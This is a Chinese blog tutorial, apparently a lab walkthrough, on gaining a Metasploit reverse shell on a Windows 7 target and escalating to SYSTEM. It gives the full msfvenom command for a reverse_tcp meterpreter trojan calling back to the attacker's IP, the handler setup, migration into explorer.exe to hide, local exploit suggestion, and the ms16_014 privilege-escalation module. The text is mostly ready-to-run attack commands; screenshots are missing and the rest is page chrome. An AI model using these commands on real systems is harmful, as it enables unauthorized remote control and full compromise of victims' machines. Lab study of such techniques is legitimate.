利用msf实现windows的上线与提权

环境部署

攻击机:Kali ip:192.168.208.138
靶机:Win7(x64) ip:192.168.208.142

Payload (因为是靶机测试,可以在Kali开启apache2服务或者使用WinSCP将木马传入目标靶机,方便后面监听)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.138 LPORT=6666 -f exe > reverse.exe

开启监听

use exploit/multi/handler

设置payload

set payload windows/x64/meterpreter/reverse_tcp

设置lhost

set lhost 192.168.208.138

设置lport

set lport 6666

然后运行

exploit

在Win7靶机打开传入的木马,Kali成功上线!
在这里插入图片描述
上线后进行进程迁移(隐藏自己),把进程迁移到explore.exe中,1844为进程的pid

migrate 1844

输入指令查看当前用户权限
在这里插入图片描述

攻击提权

system为Win7最高权限,开始提权!
首先输入background命令将session放到后台
在这里插入图片描述
然后开始执行攻击模块,探索系统存在的漏洞(未修补)

use post/multi/recon/local_exploit_suggester

在这里插入图片描述
将后台的session 1 会话拿出来,执行exp
在这里插入图片描述
在探测出的系统漏洞中选择攻击模块进行提权

set session 1
use exploit/windows/local/ms16_014_wmi_recv_notif
exploit

在这里插入图片描述

在这里插入图片描述

成功提权

通过返回信息说明攻击成功,并返回shell,输入指令查看当前用户权限,发现是system,提权成功!
在这里插入图片描述

  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值